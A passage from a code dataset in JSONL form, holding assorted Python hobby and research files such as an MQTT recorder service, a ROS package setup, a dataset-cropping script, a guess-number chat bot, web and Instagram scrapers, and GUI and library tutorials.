{target.__class__.__name__} lowed to {target._get_health()}')\n # print('------------')\n # else:\n # print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\n\n\nunit1 = Warrior(50, 50)\nprint(unit1.health)\nunit2 = Wizard(50, 50, 50)\nunit1.attacks(unit2)\nunit1.heal(unit2)\n","repo_name":"VladBaryliuk/my_start_tasks","sub_path":"new/src/06.03.2021/refactored.py","file_name":"refactored.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"6928865764","text":"#!/usr/bin/env python3\n#\n# Aiko Service: Recorder\n# ~~~~~~~~~~~~~~~~~~~~~~\n#\n# Usage\n# ~~~~~\n# mosquitto_sub -t '#' -v\n# REGISTRAR=0 registrar &\n# RECORDER=0 ./recorder.py [topic_path_filter] &\n#\n# Where \"topic_path_filter\" default: \"aiko/+/+/+/log\"\n#\n# To Do\n# ~~~~~\n# - Improve CLI to record multiple different topic paths\n# - On-the-fly configuration ...\n# - _RING_BUFFER_SIZE, _TOPIC_LRU_CACHE_SIZE\n# - topic_path_filter causes unsubscribe and resubscribe to correct topic\n# - Keep statistics for ...\n# - Topic LRU cache length\n# - Total messages received / sent, messages received / sent per second\n# - Why doesn't Python MQTT client subscribe(\"+/+/+/+/log\") work ?\n\nimport click\nfrom collections import deque\n\nfrom aiko_services import *\nfrom aiko_services.utilities import *\n\nSERVICE_TYPE = \"recorder\"\nPROTOCOL = f\"{ServiceProtocol.AIKO}/{SERVICE_TYPE}:0\"\n\n_LOGGER = aiko.logger(__name__)\n_VERSION = 0\n\n_LRU_CACHE_SIZE = 2 # 128\n_RING_BUFFER_SIZE = 2 # 128\n\n# --------------------------------------------------------------------------- #\n\nclass Recorder(Service):\n def __init__(self,\n implementations, name, protocol, tags, transport,\n topic_path_filter):\n\n implementations[\"Service\"].__init__(self,\n implementations, name, protocol, tags, transport)\n\n# TODO: Add LRUCache popitem() handler to remove oldest ring buffer ?\n# And send ECProducer.remove(topic) to update the ECConsumer\n self.lru_cache = LRUCache(_LRU_CACHE_SIZE)\n\n self.state = {\n \"lifecycle\": \"ready\",\n \"log_level\": get_log_level_name(_LOGGER),\n \"source_file\": f\"v{_VERSION}⇒{__file__}\",\n \"lru_cache\": {}, # HACK\n \"lru_cache_size\": _LRU_CACHE_SIZE,\n \"ring_buffer_size\": _RING_BUFFER_SIZE,\n \"topic_path_filter\": topic_path_filter\n }\n self.ec_producer = ECProducer(self, self.state)\n self.ec_producer.add_handler(self._ec_producer_change_handler)\n\n self.add_message_handler(self.recorder_handler, topic_path_filter)\n\n def _ec_producer_change_handler(self, command, item_name, item_value):\n if item_name == \"log_level\":\n _LOGGER.setLevel(str(item_value).upper())\n\n def recorder_handler(self, aiko, topic, payload_in):\n if topic in self.lru_cache:\n ring_buffer = self.lru_cache.get(topic)\n else:\n ring_buffer = deque(maxlen=_RING_BUFFER_SIZE)\n# TODO: If LRUCache popitem(), then manually remove oldest ring buffer ?\n# And send ECProducer.remove(topic) to update the ECConsumer\n self.lru_cache.put(topic, ring_buffer)\n\n# TODO: \"utilities/parser.py\": generate() and parse() need to handle\n# log messages with special characters ... use Canonical S-Expressions ?\n\n log_record = payload_in.replace(\" \", \"_\")\n log_record = log_record.replace(\"(\", \"{\")\n log_record = log_record.replace(\")\", \"}\")\n ring_buffer.append(log_record)\n self.ec_producer.update(f\"lru_cache.{topic}\", log_record) # HACK\n\n# TODO: \"share.py:ECConsumer._consumer_handler()\" needs to handle list and dict\n# Appears that the \"(add ...)\" fails, but \"(update ...)\" works ?\n# Dashboard being updated with dict of entries that are lists ... works !\n\n# --------------------------------------------------------------------------- #\n\n@click.command(\"main\", help=\"Recorder Service\")\n@click.argument(\"topic_path_filter\", nargs=1, required=False,\n default=f\"{get_namespace()}/+/+/+/log\")\ndef main(topic_path_filter):\n tags = [\"ec=true\"] # TODO: Add ECProducer tag before add to Registrar\n init_args = service_args(SERVICE_TYPE, PROTOCOL, tags)\n init_args[\"topic_path_filter\"] = topic_path_filter\n recorder = compose_instance(Recorder, init_args)\n aiko.process.run()\n\nif __name__ == \"__main__\":\n main()\n\n# --------------------------------------------------------------------------- #\n","repo_name":"geekscape/aiko_services","sub_path":"aiko_services/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"34087089694","text":"from setuptools import setup\nimport os \nfrom glob import glob \n\npackage_name = 'marselotech_my_nav2_system'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (os.path.join('share', package_name, 'config'), glob('config/*.pgm')),\n (os.path.join('share', package_name, 'config'), glob('config/*.yaml')),\n (os.path.join('share', package_name, 'config'), glob('config/*.rviz')),\n (os.path.join('share', package_name, 'launch'), glob('launch/*.launch.py')),\n (os.path.join('share', package_name, 'launch'), glob('marselotech_my_nav2_system/*.py')),\n (os.path.join('share', package_name, 'config'), glob('config/*.lua')),\n (os.path.join('share', package_name, 'config'), glob('config/*.yaml')),\n (os.path.join('share', package_name, 'config'), glob('config/*.xml')) \n\n \n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='asperez@upv.es',\n maintainer_email='asperez@upv.es@todo.todo',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'initial_pose_pub = marselotech_my_nav2_system.initial_pose_pub:main', #añadir\n 'action_server = marselotech_my_nav2_system.action_server:main',\n 'nav_to_pose = marselotech_my_nav2_system.nav_to_pose:main', # incluir\n 'waypoint_follower = marselotech_my_nav2_system.waypoint_follower:main'\n\n ],\n },\n)\n","repo_name":"leire07/marselotech","sub_path":"marselotech_my_nav2_system/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"35661987785","text":"import time\r\nimport logging\r\nimport threading\r\n\r\n\r\n#sleep(segundos) EEJJJJJ: 0.5\r\n\r\n\r\nlogging.basicConfig(\r\n level=logging.DEBUG,\r\n format='%(thread)s %(threadName)s : %(message)s'\r\n)\r\n\r\ndef task():\r\n logging.info('Se ejecuta una nueva tarea')\r\n time.sleep(2)\r\n logging.info('Se terminó la nueva tarea')\r\n\r\n\r\nif __name__ == '__main__':\r\n #thread = threading.Thread(target=task)\r\n #thread.start()\r\n\r\n contador=0\r\n\r\n while True:\r\n time.sleep(1)\r\n contador+=1\r\n logging.info(f'Tiempo transcurrido: {contador} segundos')\r\n\r\n","repo_name":"eduardotorrezh/PythonConcurrentExamples","sub_path":"Introduccion/DormirHilo.py","file_name":"DormirHilo.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15836122820","text":"import numpy as np\nimport xml.etree.ElementTree as ET\nfrom PIL import Image\nimport os\nimport random\nimport argparse\n\n\nclass CreateDataset:\n\n def __init__(self,\n DETRAC_images,\n DETRAC_annots,\n output_train,\n occlusion_threshold,\n truncation_threshold,\n occurrences):\n self.root_images = DETRAC_images\n self.root_annots = DETRAC_annots\n self.output_folder = output_train\n self.occ_thresh = occlusion_threshold\n self.trunc_thresh = truncation_threshold\n self.no_of_occurrences = occurrences\n self.resize = (100, 100)\n\n def get_sequences(self):\n sequences = [x[1] for x in os.walk(self.root_images)]\n sequences = sequences[0]\n return sequences\n\n def calc_dict(self, frames):\n target_id_dict = {}\n for frame in frames:\n frame_num = int(frame.attrib['num'])\n target_list = frame.find('target_list')\n targets = target_list.findall('target')\n for target in targets:\n target_id = target.attrib['id']\n attribute = target.find('attribute')\n occlusion = target.find('occlusion')\n\n box = target.find('box')\n width = round(float(box.attrib['width']))\n height = round(float(box.attrib['height']))\n\n truncation_ratio = float(attribute.attrib['truncation_ratio'])\n\n if occlusion is not None:\n region_overlap = occlusion.find('region_overlap')\n overlap_width = round(float(region_overlap.attrib['width']))\n overlap_height = round(float(region_overlap.attrib['height']))\n occlusion_ratio = (overlap_width * overlap_height) / (width * height)\n else:\n occlusion_ratio = 0\n\n if target_id not in list(target_id_dict):\n target_id_dict[target_id] = []\n\n if occlusion_ratio < self.occ_thresh and truncation_ratio < self.trunc_thresh:\n target_id_dict[target_id].append(frame_num)\n\n for target_id in list(target_id_dict):\n no_of_occurrences = len(target_id_dict[target_id])\n if no_of_occurrences >= self.no_of_occurrences:\n min_frame = min(target_id_dict[target_id])\n max_frame = max(target_id_dict[target_id])\n sample = random.sample(range(min_frame, max_frame), min(self.no_of_occurrences, len(range(min_frame, max_frame))))\n target_id_dict[target_id] = sample\n\n elif no_of_occurrences < self.no_of_occurrences:\n target_id_dict.pop(target_id)\n return target_id_dict\n\n def crop_sequence_images(self, sequences):\n max_target_id = 0\n for sequence in sequences:\n tree = ET.parse(self.root_annots + sequence + '_v3.xml')\n root = tree.getroot()\n frames = root.findall('frame')\n target_id_dict = self.calc_dict(frames)\n target_id_list = list(target_id_dict)\n\n for frame in frames:\n target_list = frame.find('target_list')\n targets = target_list.findall('target')\n frame_num = int(frame.attrib['num'])\n for target in targets:\n box = target.find('box')\n target_id = target.attrib['id']\n if target_id in target_id_list:\n frame_list = target_id_dict[target_id]\n if frame_num in frame_list:\n left = round(float(box.attrib['left']))\n top = round(float(box.attrib['top']))\n width = round(float(box.attrib['width']))\n height = round(float(box.attrib['height']))\n\n right = left + width\n bottom = top + height\n\n image_frame = \"img\" + str(frame_num).zfill(5) + '.jpg'\n\n rectangle = (left, top, right, bottom)\n\n # vehicle_type = attribute.attrib['vehicle_type']\n # truncation_ratio = attribute.attrib['truncation_ratio']\n image = Image.open(self.root_images + sequence + '/' + image_frame)\n image = image.crop(rectangle)\n image = image.resize(self.resize)\n market1501_id = str(int(target_id) + int(max_target_id)).zfill(5) + '_c' + sequence[-5:] \\\n + 's1_' + str(frame_num).zfill(5) + '_01'\n image.save(self.output_folder + market1501_id + '.jpg')\n\n max_target_id += int(target_id)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Create cropped sequences of vehicles from DETRAC dataset.\")\n parser.add_argument(\"--DETRAC_images\",\n help=\"Relative location of DETRAC training images.\",\n default=\"./Insight-MVT_Annotation_Train/\")\n parser.add_argument(\"--DETRAC_annots\",\n help=\"Relative location of DETRAC annotation files.\",\n default=\"./DETRAC-Train-Annotations-XML-v3/\")\n parser.add_argument(\"--output_train\",\n help=\"Relative output location of cropped training images.\",\n default=\"./DETRAC_cropped/\")\n parser.add_argument(\"--occlusion_threshold\",\n help='Ignore images with an occlusion ratio higher than the threshold.',\n default=0.5, type=float)\n parser.add_argument(\"--truncation_threshold\",\n help='Ignore images with an truncation ratio higher than the threshold.',\n default=0.5, type=float)\n parser.add_argument(\"--occurrences\",\n help='Number of occurrences of each sequence of vehicles.',\n default=100, type=int)\n args = parser.parse_args()\n \n DETRAC_images = args.DETRAC_images\n if not os.path.exists(DETRAC_images):\n print('Cannot find path to DETRAC images.')\n sys.exit()\n\n DETRAC_annots = args.DETRAC_annots\n if not os.path.exists(DETRAC_annots):\n print('Cannot find path to DETRAC annotations.')\n sys.exit()\n\n output_train = args.output_train\n if not os.path.exists(output_train):\n os.makedirs(output_train)\n\n if not os.access(output_train, os.W_OK):\n print('{} folder is not writeable.'.format(output_train))\n\n occlusion_threshold = args.occlusion_threshold\n truncation_threshold = args.truncation_threshold\n occurrences = args.occurrences\n\n create_dataset = CreateDataset(DETRAC_images,\n DETRAC_annots,\n output_train,\n occlusion_threshold,\n truncation_threshold,\n occurrences)\n\n sequences = create_dataset.get_sequences()\n\n create_dataset.crop_sequence_images(sequences)\n\n","repo_name":"LeonLok/Multi-Camera-Live-Object-Tracking","sub_path":"detrac_tools/crop_dataset.py","file_name":"crop_dataset.py","file_ext":"py","file_size_in_byte":7632,"program_lang":"python","lang":"en","doc_type":"code","stars":875,"dataset":"github-code","pt":"57"} +{"seq_id":"29813747548","text":"my_variable = \"hello\"\n\ngrades = [77, 80, 90]\ntuple_grades = (77, 80, 90)\nset_grades = {77, 80, 90}\n\nset_grades.add(60)\n# print(set_grades)\n\n\nyour_lottery_numbers = {1, 2, 3, 4, 5}\nwinning_numbers = {1, 3, 5, 7, 9, 11}\n\n# print(your_lottery_numbers.intersection(winning_numbers))\n# print(your_lottery_numbers.union(winning_numbers))\n# print({1, 2, 3, 4}.difference({1, 2}))\n","repo_name":"Chil625/FlaskPractice","sub_path":"lec1/lists_tuples_sets.py","file_name":"lists_tuples_sets.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"29547066269","text":"import pyjd\n\nfrom pyjamas import DOM\nfrom pyjamas import logging\n\nfrom pyjamas.ui.RootPanel import RootPanel\nfrom pyjamas.ui.HTML import HTML\nfrom pyjamas.ui.Label import Label\nfrom pyjamas.ui.Map import ImageMap, MapArea\nfrom pyjamas.ui.HorizontalPanel import HorizontalPanel\nfrom pyjamas.ui.VerticalPanel import VerticalPanel\nfrom pyjamas.ui.ScrollPanel import ScrollPanel\nfrom pyjamas.ui.MenuBar import MenuBar\nfrom pyjamas.ui.Image import Image\nfrom pyjamas.ui.ContextMenuPopupPanel import ContextMenuPopupPanel\n\nlog = logging.getAppendLogger(__name__, logging.DEBUG, logging.PLAIN_FORMAT)\n\n\nclass MapAreaDemo:\n\n def onModuleLoad(self):\n # build image display\n width = 200 #px\n height = 215 #px\n scale = 1.5\n img = Image(\n \"babykatie_small.jpg\",\n Width=\"%dpx\" % int(scale * width),\n Height=\"%dpx\" % int(scale * height),\n )\n img.element.setAttribute(\"usemap\", \"#themap\")\n img.element.setAttribute(\"ismap\", \"1\")\n imagepanel = ScrollPanel()\n imagepanel.add(img)\n\n # build message display\n msgpanel = VerticalPanel()\n msgpanel.add(Label(\"move mouse over baby katie's eyes, nose and mouth.\"))\n msgarea1 = Label(\"movement messages\")\n msgpanel.add(msgarea1)\n msgarea2 = Label(\"click messages\")\n msgpanel.add(msgarea2)\n\n imageClickHandler = MapClickHandler(msgarea1, msgarea2)\n\n # build imagemap\n map = ImageMap(\"themap\",\n Width=\"%dpx\" % int(scale * width),\n Height=\"%dpx\" % int(scale * height),\n )\n areas = [ \\\n NamedMapArea(\n \"right eye\",\n \"circle\",\n [scale * i for i in [73, 97, 7]],\n ),\n NamedMapArea(\n \"left eye\",\n \"circle\",\n [scale * i for i in [116, 88, 5]],\n ),\n NamedMapArea(\n \"nose\",\n \"rect\",\n [scale * i for i in [88, 97, 115, 115]],\n Href=\"http://lkcl.net\",\n ),\n NamedMapArea(\n \"mouth\",\n \"polygon\",\n [scale * i for i in [82, 129, 102, 124, 119, 119, 121, 125, 103, 132, 79, 133]],\n ),\n ]\n for nma in areas:\n nma.addMouseListener(imageClickHandler)\n nma.addClickListener(imageClickHandler)\n map.add(nma)\n\n # layout page\n hpanel = HorizontalPanel()\n hpanel.add(map)\n hpanel.add(imagepanel)\n hpanel.add(msgpanel)\n\n RootPanel().add(hpanel)\n\n\nclass NamedMapArea(MapArea):\n \"\"\" An area inside an imagemap with a name\n \"\"\"\n\n def __init__(self, areaname, shape, coords, Href=\"\", **kwargs):\n self.areaname = areaname\n coords = \", \".join([\"%d\" % int(i) for i in coords])\n MapArea.__init__(self, shape, coords, Href=Href, **kwargs)\n\n\nclass MapClickHandler:\n\n def __init__(self, msgarea1, msgarea2):\n self.msgarea1 = msgarea1\n self.msgarea2 = msgarea2\n\n def _mouseActionMessage(self, name, action, x=None, y=None):\n #msg = \"%s %s (%d,%d)\" % (name, action, x, y) # throws JS errors\n msg = name + ' ' + action + ' (' + str(x) + ', ' + str(y) + ')'\n self.msgarea1.setText(msg)\n log.debug(msg)\n\n def onMouseMove(self, sender, x, y):\n self._mouseActionMessage(sender.areaname, \"move\", x, y)\n\n def onMouseDown(self, sender, x, y):\n self._mouseActionMessage(sender.areaname, \"down\", x, y)\n\n def onMouseUp(self, sender, x, y):\n self._mouseActionMessage(sender.areaname, \"up\", x, y)\n\n def onMouseEnter(self, sender):\n self._mouseActionMessage(sender.areaname, \"enter\")\n\n def onMouseLeave(self, sender):\n self._mouseActionMessage(sender.areaname, \"leave\")\n\n def onClick(self, sender):\n msg = \"you clicked on baby katie's \" + sender.areaname\n self.msgarea2.setText(msg)\n log.debug(msg)\n\n\nif __name__ == '__main__':\n pyjd.setup(\"http://127.0.0.1/examples/maparea/public/MapAreaDemo.html\")\n app = MapAreaDemo()\n app.onModuleLoad()\n pyjd.run()\n","repo_name":"pyjs/pyjs","sub_path":"examples/maparea/MapAreaDemo.py","file_name":"MapAreaDemo.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":1132,"dataset":"github-code","pt":"57"} +{"seq_id":"43053182418","text":"from gametree.playerstate.player_id import PlayerId\n\nfrom gametree.gamestate.game_state import GameState\n\nfrom typing import Tuple\n\nfrom opp_model import OpponentModel\nfrom sklearn.tree import DecisionTreeClassifier\nfrom pickle import load\nfrom pandas import DataFrame\n\nclass Opponents(OpponentModel):\n botId: PlayerId\n model: DecisionTreeClassifier\n\n\n def __init__(self, id: PlayerId):\n self.botId = id\n\n decision_tree_model_pkl = open(\"opp_model.pkl\", 'rb')\n self.model = load(decision_tree_model_pkl)\n\n def get_bot_id(self) -> PlayerId:\n return self.botID\n\n def get_action_probs(self, gs:GameState):\n player_map = {player: seat for seat, player in gs.seat_map.items()}\n suit_map = {\"C\": 0, \"D\": 1, \"H\": 2, \"S\": 3}\n num_map = {\"A\": 1, \"T\": 10, \"J\": 11, \"Q\": 12, \"K\": 13}\n action_list = []\n hand_list = []\n community_card_list = []\n for player, seat in player_map.items():\n if seat.getId() < player_map[self.botId].getId():\n # Get known actions\n # TO DO: convert output of get_prev_action() to -1,0,1+\n action_list.append(player.get_prev_action())\n elif(seat.getId() == player_map[self.botId].getId()):\n for card in player.get_cards():\n try:\n num_val = num_map[card.rank]\n except KeyError:\n num_val = int(card.rank)\n hand_list.append(suit_map[card.suit]*13 + num_val)\n else:\n action_list.append(-10)\n\n for card in gs.get_community_cards():\n try:\n num_val = num_map[card.rank]\n except KeyError:\n num_val = int(card.rank)\n community_card_list.append(suit_map[card.suit]*13 + num_val)\n for _ in range(len(gs.get_community_cards),5):\n community_card_list.append(0)\n\n input_cols = {'hand1':[],'hand2':[],'board1':[],'board2':[],'board3':[],'board4':[],'board5':[], 'action1':[],'action2':[],'action3':[],'action4':[],'action5':[]}\n input = DataFrame(input_cols)\n input.loc[0] = [*hand_list, *community_card_list, *action_list]\n\n return self.model.predict(input), self.model.predict_proba(input)\n \n def get_check_bet_probabilities(self, gamestate: GameState, actor: PlayerId) -> Tuple[float, float]:\n _, probs = self.get_action_probs(gamestate)\n return (sum(probs[:2]), sum(probs[2:]))\n\n def get_fold_call_raise_probabilities(self, gamestate: GameState, actor: PlayerId) -> Tuple[float, float, float]:\n _, probs = self.get_action_probs(gamestate)\n return (probs[0], probs[1], sum(probs[2:]))","repo_name":"kshah0/pokerProject","sub_path":"src/opponents.py","file_name":"opponents.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18644819202","text":"\"\"\"docx_tutorial.py\n튜토리얼 코드 : https://python-docx.readthedocs.io/en/latest/\n\"\"\"\nfrom docx import Document\nfrom docx.shared import Inches\n\ndocument = Document()\n\n# 헤더 추가 -> H0\ndocument.add_heading(\"Document Title\", 0)\n\n# paragraph, run 추가 및 속성 적용\np = document.add_paragraph(\"A plain paragraph having some \")\np.add_run(\"bold\").bold = True\np.add_run(\" and some \")\np.add_run(\"italic\").italic = True\n\ndocument.add_heading(\"Heading, level 1\", level=1)\n# 스타일 적용\ndocument.add_paragraph(\"Intense quote\", style=\"Intense Quote\")\ndocument.add_paragraph(\"first item in unordered list\", style=\"List Bullet\")\ndocument.add_paragraph(\"first item in ordered list\", style=\"List Number\")\n\n# 사진 추가하기\ndocument.add_picture(\"catlogo.png\", width=Inches(1.25))\n\nrecords = (\n (3, \"101\", \"Spam\"),\n (7, \"422\", \"Eggs\"),\n (4, \"631\", \"Spam, spam, eggs, and spam\")\n)\n\n# 표 추가하기\ntable = document.add_table(rows=1, cols=3)\nhdr_cells = table.rows[0].cells\nhdr_cells[0].text = \"Qty\"\nhdr_cells[1].text = \"Id\"\nhdr_cells[2].text = \"Desc\"\nfor qty, id, desc in records:\n row_cells = table.add_row().cells\n row_cells[0].text = str(qty)\n row_cells[1].text = id\n row_cells[2].text = desc\n\ndocument.add_page_break()\n\ndocument.save(\"demo.docx\")\n","repo_name":"zeroam/TIL","sub_path":"books/PythonAutomate/pdf_word_documents/docx_tutorial.py","file_name":"docx_tutorial.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"72117597298","text":"# -*- coding: utf-8 -*-\n# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\nimport scrapy\nfrom scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nfrom scrapyexe.items import ScrapyexeItem\nfrom scrapy.loader import ItemLoader\nfrom scrapy import Request\nimport re\nclass ScrapyexeSpider(Spider):\n name = 'dianping_old'\n allowed_domains = ['www.dianping.com']\n start_urls = ['http://s.dianping.com/chengdu/group?utm_source=dp_pc_index']\n\n def parse(self,response):\n item_num = len(response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[*]/div/h3').extract())\n print(item_num)\n for i in range(item_num):\n item = ScrapyexeItem()\n item['title'] = response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/h3/a/text()'%(i)).extract()[0] #返回是list\n item['url'] = response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/h3/a/@href'%(i)).extract()[0]\n author = response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/div/a[2]/text()'%(i)).extract()[0]\n item['author'] = author.strip()\n item['group']=response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/div/a[3]/text()'%(i)).extract()[0]\n url = str(item['url'])\n #print(url)\n # url = 'https://www.jianshu.com'+url\n # yield Request(url, callback=self.parse_detail)\n yield item\n yield Request(url, callback=self.parse_details, dont_filter=True)\n break\n def parse_details(self, response):\n details_info = response.xpath('/html/body/div[2]/div[3]/div[2]')\n if details_info:\n # l = ItemLoader(ScrapyexeItem(),details_info)\n # l.add_xpath('content','/html/body/div[2]/div[3]/div[2]/div[3]/text()')\n # yield l.load_item()\n item_content = ScrapyexeItem()\n content_num = len(response.selector.xpath('/html/body/div[2]/div[3]/div[2]/div[3]/div[*]').extract())\n\n print(content_num)\n content = ''\n for i in range(content_num):\n content += response.selector.xpath('/html/body/div[2]/div[3]/div[2]/div[3]/div[%d+1]'%(i)).extract()[0]\n # print(content)\n zh = re.compile(u'[\\u4e00-\\u9fa5]+') #提取中文的正则\n content = re.findall(zh,content)\n content = ''.join(content)\n #print(content)\n item_content['content'] = content\n yield item_content\n\n","repo_name":"jiaweijin/lilaroka","sub_path":"scrapyexe/spiders/dianping.py","file_name":"dianping.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"1022083135","text":"# closure2.py\n\n# 创建一系列的函数:\n# def pow2(x):\n# return x ** 2\n\n# def pow3(x):\n# return x ** 3\n# ...\n# def pow300(x):\n# return x ** 300\n# ...\n\ndef make_power(y):\n def fn(x):\n return x ** y\n return fn\n\npow2 = make_power(2) # pow2绑定闭包函数\nprint(pow2(3)) # 9\nprint(pow2(4)) # 16\n\npow5 = make_power(5)\nprint(pow5(2)) # 32\nprint(pow5(4)) # 1024\n\n","repo_name":"zuigehulu/AID1811","sub_path":"pbase/day11/jiangyi/day11/code/closure2.py","file_name":"closure2.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"10944140058","text":"# -*- coding=utf8 -*-\n\nimport random\n\nGROUP_NOT_EXIST = 999\n\nguessNumberPool = {} # 用来储存对应的群聊的游戏\n\nclass GuessNumber(object):\n def __init__(self, lower, upper=None):\n if not upper:\n upper = lower\n lower = 0\n self.lower = lower\n self.upper = upper\n self.answer = random.randint(lower, upper)\n self.rounds = 0\n # print(\"新游戏:{l}, {u}, {a}\".format(l=self.lower, u=self.upper, a=self.answer))\n\n def guess(self, g, member):\n if g<self.lower or g>self.upper:\n return -1, \"{g} 不在范围哇\".format(g=g)\n elif g==self.answer:\n self.rounds += 1\n return 1, \"{m}猜中了数字{a}!\\n回合数:{r}\".format(m=member.name, a=self.answer, r=self.rounds)\n elif g < self.answer:\n self.lower = g+1\n self.rounds += 1\n return 0, \"新范围 [{lower}, {upper}]\".format(\n lower=self.lower, upper=self.upper)\n else:\n self.upper = g-1\n self.rounds += 1\n return 0, \"新范围 [{lower}, {upper}]\".format(\n lower=self.lower, upper=self.upper)\n\n def restart(self, lower, upper=None):\n if not upper:\n upper = lower\n lower = 0\n self.lower = lower\n self.upper = upper\n self.answer = random.randint(lower, upper)\n self.rounds = 0\n\n def __repr__(self):\n return \"范围在 [{lower}, {upper}]\".format(lower=self.lower, upper=self.upper)\n\n\ndef help():\n res = \"发送消息:\\n\"\n res += \"“猜数字 xx” - 开启 0~xx 的新游戏\\n\"\n res += \"“猜数字 xx yy” - 开启 xx~yy 的新游戏\\n\"\n res += \"“zz” - 一轮猜数字\\n\"\n res += \"“范围” - 显示数字范围\\n\"\n res += \"“结束” - 结束游戏\\n\"\n res += \"“帮助” - 查看帮助\"\n return res\n\n\ndef newGame(group, lower, upper=None):\n if guessNumberPool.get(group):\n guessNumberPool[group].restart(lower, upper)\n else:\n guessNumberPool[group] = GuessNumber(lower, upper)\n return guessNumberPool[group]\n\n\ndef guess(group, number, member):\n if guessNumberPool.get(group):\n return guessNumberPool[group].guess(number, member)\n else:\n return GROUP_NOT_EXIST, False\n\n\n# 检查一个字符串是否代表整数\ndef RepresentsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n\ndef checkRaw(group, member, raw):\n # 检查是否是想新建游戏\n cmd = raw.strip().split()\n if len(cmd) == 2 and cmd[0] == \"猜数字\" and RepresentsInt(cmd[1]) and int(cmd[1]) > 0:\n return newGame(group, int(cmd[1]))\n elif len(cmd) == 3 and cmd[0] == \"猜数字\" and RepresentsInt(cmd[1]) and RepresentsInt(cmd[2]) \\\n and int(cmd[1]) >= 0 and int(cmd[1]) < int(cmd[2]):\n return newGame(group, int(cmd[1]), int(cmd[2]))\n elif len(cmd) == 1 and RepresentsInt(cmd[0]):\n res = guess(group, int(cmd[0]), member)\n if res[0] == 1:\n # 猜中了就结束游戏\n del guessNumberPool[group]\n return res[1]\n elif raw == \"帮助\":\n return help()\n elif raw == \"范围\" and guessNumberPool.get(group):\n return guessNumberPool[group]\n elif raw == \"结束\" and guessNumberPool.get(group):\n del guessNumberPool[group]\n return \"猜数字游戏结束\"\n else:\n return False","repo_name":"Zing22/GuessNumBot","sub_path":"bot/guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"71795006899","text":"import instaloader\n\nL = instaloader.Instaloader()\n\nusername = 'username'\n\nprofile_username = 'gaben_newell'\n\n\ntry:\n L.context.log(\"Trying to login with given credentials.\")\n L.load_session_from_file(username)\n if L.context.is_logged_in:\n L.context.log(\"Login successful.\")\nexcept FileNotFoundError:\n L.context.log(\"Session file does not exist yet - Logging in.\")\n L.context.log(\"If you don't want to login, just terminate the script.\")\n L.context.log(\"To save the session after a successful login, press CTRL-Z\")\n L.interactive_login(username)\n\nprofile = instaloader.Profile.from_username(L.context, profile_username)\n\nfor post in profile.get_posts():\n\n # get only posts\n if not post.is_video:\n\n # get likes\n try:\n post_likes = post.get_likes()\n except instaloader.exceptions.LoginRequiredException:\n L.interactive_login(username)\n post_likes = post.get_likes()\n\n # Get the comments of the post\n post_comments = post.get_comments()\n\n # It will create a file named as profile_username.txt and write all likes to it. \n # You can find your cmd path and open it. ex: if your cmd path is C:\\Users\\MyPC> then you can find your file in C:\\Users\\MyPC\\profile_username.txt\n like_count = {}\n for likee in post_likes:\n print(likee.username)\n with open(profile_username + \".txt\", \"a\") as f:\n f.write(likee.username + \"\\n\")\n","repo_name":"lordexoc/who-liked-most-instagram","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"30741006759","text":"\nimport unittest\nfrom logging import getLogger\n\nlog = getLogger()\n\nclass StructuresTestCase(unittest.TestCase):\n def test_guid_converison(self):\n from .functions import pretty_string_to_guid, guid_to_pretty_string\n from .constants import SCSIADAPTER_GUID_STRING as pretty_string\n self.assertEqual(pretty_string,\n guid_to_pretty_string(pretty_string_to_guid(pretty_string)))\n\n def test_sizes(self):\n from .structures import GUID, SP_DEVINFO_DATA, is_64bit\n self.assertEqual(GUID.min_max_sizeof().max, 16)\n self.assertEqual(SP_DEVINFO_DATA.min_max_sizeof().max, 32 if is_64bit() else 28)\n\nclass FunctionTestCase(unittest.TestCase):\n def setUp(self):\n from os import name\n if name != 